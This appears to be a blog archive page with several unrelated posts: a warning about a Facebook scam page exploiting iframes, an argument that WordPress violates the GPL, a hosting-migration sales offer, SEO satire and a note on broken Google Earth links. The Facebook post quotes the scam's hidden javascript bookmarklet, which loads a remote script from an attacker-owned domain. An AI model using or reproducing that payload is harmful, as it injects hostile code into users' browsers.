Facebook has never been known for it’s safety. It is a site designed so that the least Internet savvy people out there can sign up and network with millions of other people, both those they know and those they don’t, with only a minimal amount of technical know-how required (ie. how to sign up, and how to browse). It is a giant playground filled with games and people to talk to from all over the world, luring in droves of people who, when they come, know nothing about “scareware”, or “phishing scams”, or even how to clean a virus from their machine if they get one. Sure, they’ve been told that if they visit porn sites they could very well get a virus, but hey, this is Facebook, everyone is on Facebook… it must be safe. The result is a gigantic community of gullible marks just waiting to be exploited or infected by scammers and hackers.

That is why a couple of years ago I wrote a post on how to prevent getting hacked on Facebook (as well as on Twitter or Myspace). I happen to have quite a few friends and family who are not highly knowledgeable when it comes to the Internet, and through talking to them I came to realize that some of the things I take for granted many people were just not aware of. In the article I went into depth on some of the very basics of Internet security, such as what is the address bar in the browser, and how you needed to be sure you were on the site you thought you were on. That one simple tip could have saved millions of victims of phishing scams, had they just known where to look. Now, some fucking moron developer employed by Mark Zuckerberg has gone and rendered that advice pretty much pointless, at least as far as Facebook is concerned.

For those of you who own WordPress blogs, you are probably aware that if you get hacked one of the biggest dangers to your readers is the iframe hack. For those of you who don’t, or who are not familiar with html, an iframe is an element on a webpage that allows you to embed a second webpage into it. It’s very common and a perfectly normal feature of the html language. Iframes in and of themselves are not dangerous. Google AdSense , when shown on a webpage other than Google, is in an iframe. The same goes for Facebook “Like” buttons. So when you visit a page that has either of those, you are visiting Google or Facebook at the same time. The important thing for webmasters to note is that you only ever embed iframes from sites you trust. The reason this is so crucial is because once you embed an iframe from a site other than your own, you have no control whatsoever over what content is served from that iframe to your visitors. None. Nadda. Zilch.

The reason that hackers like utilizing iframes for hacking is that it allows them to serve malicious code and viruses to people while they are visiting sites that they trust. If you are out there browsing some seedy sites and popups show up telling you to click on a link or that you might have a virus you are much less likely to believe it. It’s simple psychology, and your guard is already up. This is much less true if you are on a site you visit every single day with no problems.

Apparently I missed it when it happened, but a couple of months ago some genius programmer at Facebook decided to introduce a way for people to utilize iframes into Facebook Pages. I only found out about it myself when I discovered one of these pages yesterday. It was a link on a friend’s wall purporting to show pics of Osama bin Laden dead. I could tell right away that it was a scam, so I went to see just how potentially damaging it was. The first thing that struck me was that this was a page actually on Facebook itself, although it was giving instructions to enter in a series of keyboard commands, as if there were Javascript it was trying to get you to trigger. I moused around a bit, and realized there were some hidden forms on the page, which was really odd, so I went ahead and turned off all styles on the page. That’s what I saw what was going on. This is what the page looked like with normal styles turned on:

(click to enlarge)

Clicking that button then revealed these instructions:

What was not revealed, however, was the hidden <textarea> containing Javascript code that would then be fired if you did follow those instructions:

<textarea id="c">javascript:(a=(b=document).createElement('script')).src='//themafiafamily.net/bin/bl.js',b.body.appendChild(a);void(0)</textarea>

This causes a script to be injected from a domain owned by some hacker, themafiafamily.net, and it’s all downhill from there.

Of course, odds are pages like this won’t stay up for too long when they are created. There is a way to report them, and Facebook will eventually take them down once they investigate. However, there is no way to report them in a way that gets them dealt with in a timely manner. There is no “This page is hacking users” option. In fact, if you look at the “Like” counter on that page you can see that it had already hit over 109,000 people by the time I saw it, and who knows how many more before Facebook bothered to respond to the reports about it. Additionally, there is nothing stopping a hacker from running a legitimate page for a few weeks, attracting millions of people, and then deciding to hit them all with a virus afterwards.

The bottom line is that Facebook not addressing these issues and removing the ability to embed iframes borders on negligence. Currently the FTC goes after companies and organizations that do not adequately protect their user’s data:

Maybe they should start taking a look at companies that don’t adequately protect the actual users as well.

Curiosity piqued, I dug back through the tweets until I found a link to the thread Ben was referring to. It turns out that it is a bug report on the WordPress bug tracking system, opened by user “hakre”:

The wordpress software packages to download form the website contain mostly source-code.

But as it’s known, there are files and parts in these, that are binary blobs and w/o their source as specified in the terms of the GNU GPL.

According to §1, §2 and §3 of the terms of the GNU GPL v2, the wordpress project must offer full source-code in order to distribute the whole package under GPL.

In §3 it’s made more specific what sources are:

The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable.

I was looking over the wordpress homepage but I could not find any information where to obtain the according sources that are missing from the packages – either in full source packages or in it’s additional form.

Probably I’ve overlooked something, please help me obtaining such information. – hakre

What hakre was referring to was a specific section of the GNU General Public License v2.0, which is the license that WordPress is released under. The requirements of the license dictate that anyone is free to modify or redistribute the software package, as long as the license itself stays intact, and as long as whoever receives the software package either gets a copy of the source code, an offer in writing that they will make the source code available on request, or a copy of the offer to make said source code available if that is how it was originally offered. Basically either the actual source code must be supplied, or a clear concise guarantee that it can be supplied on demand, must be included with the distribution. For the bulk of WordPress this is no problem and would never be an issue. The core WordPress files are written in php, with some elements in Javascript or html. All 3 of those languages, unless encoded in some special way, run as is straight from the source code. Php and Javascript are “scripting” languages and html is not actually a programming language. If someone wants to see or edit the “source code” for any of those files all they need to do is open them in a text editor and just look at them.

However, what hakre was talking about was the 1 and only executable file* (see hakre’s comment below for clarification) that is currently distributed with WordPress, a file named swfupload.swf, which is located in the wp-includes/js/swfupload directory. It is a Flash file, is not considered editable by normal means, and it is compiled, not in source code form. The concern that hakre raises is quite valid, since without the source code being distributed along with this file it makes it impossible to distribute WordPress as GPL v2 software. This is a Very Big Deal, especially when you consider the rift that Matt Mullenweg created in the WordPress community over the whole issue of what GPL did and did not cover. Almost 2 years ago Matt asked a lawyer from the FSF to back up what Matt was saying, and in the closing paragraph of that post he made the following statement:

So as before, we will only promote and host things on WordPress.org that are 100% GPL or compatible. – Matt Mullenweg

The fact that WordPress can’t follow the license that they are claiming everyone else needs strict adherence to makes all of Matt’s previous pettiness just that much worse.

One of the WordPress contributers, Otto42, closed the ticket when he found it. In fact, he asked the question “What sources are missing?” in the same post, but marked the ticket as “invalid” without bothering to wait for an answer. The thread was then reopened by hakre again, after which Chip Bennett joins the conversation. In a nutshell, it’s a back and forth with Otto arguing that the source code for that file is not required, since WordPress authors did not write it, and since that particular executable is not GPL, and is instead released under the MIT License. The problem with his argument is that it is, of course, dead wrong. The GPL license does indeed allow you to distribute non-GPL licensed software within a GPL package, as long as a) the non-GPL license is less restrictive than the GPL (which the MIT license is), and b) the source code is included (which, again, WordPress is not doing here).

At one point Otto makes the following claim:

As for the GPL, we are under no obligation to provide anything at all. Understand that the people here wrote the code and share a joint ownership of it. The GPL places no obligation whatsoever on the actual copyright holders of the code. They can release it anyway they like. The GPL only applies to licensees of the code in question; the downstream people using and redistributing that code. – Otto42

That of course sums up a bigger core misunderstanding of the situation that makes me wonder if more WordPress contributers are under the same illusion… that the GPL only applies to what other people can do with WordPress, and doesn’t actually apply to the contributers, or to the WordPress Foundation, or to Matt Mullenweg. Maybe all of Matt’s talk of how the GPL embodies all of WordPress’s core values managed to bury the reality of why the GPL was being used for WordPress. The truth is, WordPress is licensed under the GPL v2 because they have no choice in the matter, they have to use it. WordPress, you see, is a derivative of yet another software package, b2/cafelog, which was licensed under the GPL v2 as of March 2nd, 2002.

Otto also is also under the misconception that the following statement in the license covers them:

If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code

As a developer I am rather surprised at Otto’s lack of grasp on the IF…THEN… element to that statement. If the executable is being distributed from a remote location, then offering the source at that same location counts as distribution of the source code. An example of an executable being offered from a designated place would be Microsoft distributing software that requires their mfc32.dll to run, and giving you a link to their website where that can be downloaded. WordPress does not say “To use our Flash uploader you will need to download the executable from here“… they distribute that executable with the WordPress package itself, which means, by the terms of the GPL license they are required to follow, that they must offer the source code as well.

The final argument in the bug report relies on the fact that inside one of the Javascript files that are bundled with SWFUpload there several links referenced, and if you follow one of those links and dig around you will eventually find the source code in question. Even this, however, is not actually sufficient. As Otto points out in several places during the discussion, SWFUpload is not in and of itself GPL, and are under no obligation to offer the source code. Therefore that site could disappear altogether and the source code would no longer be available. A link that is not a direct download being mentioned in a Javascript file is not even close to WordPress offering a place for people to download the source code.

Otto is right in one respect though, the flash file in question is under the MIT License. This license is short and sweet, and in it’s entirety reads:

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

That middle line in the license, “The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.”, is non-trivial. It plainly states that a copy of this license must be included with the software. It does not say that “a copy of the notice or a link to it” is required, it clearly states that the notice itself needs to be there… and this notice just happens to be missing from the copy of the software distributed with WordPress. It also happens to be missing from from the thickbox package that is found in wp-includes/js/thickbox as well. The fact that either copy of the license was missing from wherever the WordPress developer who included it in the package got it originally is no excuse for WordPress being non-compliant, either. It is Matt Mullenweg’s responsibility, as the distributor, to ensure that all of the licenses are in line.

There is no question, ever since WordPress included the SWFUpload software without it’s source code, which as near as I can determine started in version 2.5, they have been in clear violation of the very license they have been bashing other people over the head with. Fixing it now will not change the fact that they violated it for years, either. There really is no excuse for this.

Update: I just wanted to include a section in the GPL FAQ that I missed before that is strongly relevant to this discussion, “I downloaded just the binary from the net. If I distribute copies, do I have to get the source and distribute that too?”

Yes. The general rule is, if you distribute binaries, you must distribute the complete corresponding source code too. The exception for the case where you received a written offer for source code is quite limited.

Honestly, it doesn’t get any clearer than that. Mind you, that won’t stop people from trying to argue the point further, but the FSF themselves are very succinct on that point. SWFUpload is a binary that the WordPress developers downloaded from somewhere else and included in their package, the GPL requires that the source code be included. WordPress has been in violation of the GPL for a few years now at least.

Since this is an established pattern with them as a web host, and even though I still highly recommend them as registrars for domain names, I have decided to make this offer to all clients who want to be done with getting their sites hacked. If you hire me to clean your hacked website(s), WordPress or otherwise (since pretty much any site on GoDaddy is subject to getting hacked), and are willing to switch to Hostgator after I have you completely cleaned up (which is where this blog and many of my other sites are hosted, and a host that I highly recommend), then I will do the migration at no extra charge.

That’s right… I’ll move you to Hostgator, for free.

Now, if you want to help me out a little with that, and use the affiliate links in this post or the banner in my sidebar to purchase your hosting, then great, I will get a commission from them for doing it. But that is in no way required for this offer, and not at all why I am making this deal. You can manually type in hostgator.com into your browser, or click on a friend’s banner, or whatever. I’ll still move you for free. Everyone should have safe hosting, period, and I am willing to help people get there.

The one caveat with this offer is if you have emails stored on the old server, and use either IMAP or their webmail, and you need those old emails (not the accounts, but the actual emails) moved off of GoDaddy and stored elsewhere, then it does take a few extra minutes per email account, depending on which solution you which to use. GoDaddy doesn’t give you direct access to download and move them, but there are a couple of workarounds available. Some you can do yourself if you like (like downloading all of the emails to your local computer using POP3), some I can do for you for a very small charge. Other than that for each site I clean I will move it to the new Hostgator account for you at no charge, and that includes the files, the databases, setting up the email accounts, and any ftp users you want to move.

If you are not currently hacked, and want to move to Hostgator anyway, I’ll still offer anyone who wants it a deal. If it does not need cleaning, I will migrate your entire site for only 30 minutes worth of labor, flat fee, again not counting the moving of the physical emails. If you have multiple sites that need moved, depending on the sizes of them, I can offer you further discounts on those as well. Hell, you don’t even have to be hosted at GoDaddy to take advantage of this offer. If you’re unhappy where you are at, just let me know.

Anyone who wants to have me get started on moving them to a better host should contact me today.

I am a big one for testing, and test this tool I did. Now, I know, I may have voiced some opinions in the past as to my doubt of the sincerity of Rand Fishkin and the folks who run things over at SEOmoz, but regardless of what I said before, for me seeing is definitely believing. I plugged both the url for the post introducing the tool itself, along with the phrase [made up statistical bullshit], into the tool’s interface, and sure as hell this is what the tool showed me:

(click to enlarge)

I mean, c’mon now… those words weren’t used anywhere in the article, yet this tool was able to accurately determine that at least half* of everything that Rand said was relevant to that phrase?

I don’t know about you, but I’m convinced.

* and yes, I know, the tool guessed numbers that were way low compared to the actual quantity of bullshit in the article, but seriously… you know as well as I do that any tool that can automatically detect even trace amounts of bullshit in a post is going to be a game changer.

The first place many people would find one of the download links is right in the Google serps, once under the Google Earth sitelinks and once as it’s own listing:

That particular download link, earth.google.com/download-earth.html, is being redirected to what I am guessing is an agreement page, http://www.google.com/earth/download/ge/agree.html. This, however, returns a 404:

The second place people could normally download Google Earth from would be to go to the Google Earth homepage, which was previously located at earth.google.com, but is now being redirected to http://www.google.com/earth/index.html. There you can find 2 links, one in the left navigation and one as a large blue button with the text “Download Google Earth 5″:

As inviting as that button is, however, it is simply teasing you. Both the link and the button trigger a Javascript function named earth.downloadEarth(). Normally downloading the entire planet would be a huge power trip… today however you get from clicking the button is “Server not found”:

It looks like the reason for this one not working is because someone got sloppy when changing the links from earth.google.com to www.google.com, and simply combined the two into http://earth.googlewww.google.com/intl/en/download-earth.html, although that particular page doesn’t exist on either domain so obviously they messed up more than once. Also, what is even odder, is that the Google Earth packages are also missing from the Ubuntu download repositories:

To have Google Earth not be installable from anywhere seems almost as if there is something deliberate going on. Is Google going to phase out one of it’s cooler applications? Or is something new coming down the pipes from them that will replace it? Only time will tell.

Thanks to Donna Fontenot for discovering this today!